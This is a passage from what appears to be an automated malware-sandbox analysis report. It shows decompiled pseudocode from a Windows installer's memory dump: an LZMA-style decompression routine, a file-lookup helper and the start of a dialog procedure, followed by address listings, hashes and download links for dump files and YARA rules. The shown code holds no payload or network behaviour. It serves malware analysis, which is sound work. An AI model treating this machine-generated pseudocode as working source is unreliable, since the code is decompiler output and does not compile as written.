							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x004061d4
                0x004061d4
                0x004061d9
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00000000
                0x00406891
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x00000000
                0x004068b3
                0x004061db
                0x004061db
                0x004061df
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x00406200
                0x00406207
                0x0040620a
                0x00406215
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406224
                0x00406242
                0x00406244
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406469
                0x0040646c
                0x0040640f
                0x00406415
                0x00000000
                0x00000000
                0x00000000
                0x0040646e
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x0040640c
                0x00000000
                0x0040640c
                0x00406226
                0x00406226
                0x00406229
                0x0040622f
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406318
                0x0040631b
                0x00406292
                0x00406292
                0x00406298
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x004063a5
                0x004063a8
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406348
                0x00406348
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063b3
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x0040657f
                0x0040657f
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x004062a4
                0x00000000
                0x00000000
                0x00000000
                0x00406321
                0x0040626d
                0x00406271
                0x004069de
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628f
                0x00000000
                0x0040628f
                0x0040631b
                0x00406224
                0x00406058
                0x00406058
                0x00406061
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00000000
                0x0040683d
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x00000000
                0x004069b0
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00000000
                0x00406805
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                0x00405e9e
                0x00405ea7
                0x00000000
                0x00405eb4
                0x00405eaa
                0x00000000

                APIs
                • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405E9E
                • FindClose.KERNEL32(00000000), ref: 00405EAA
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
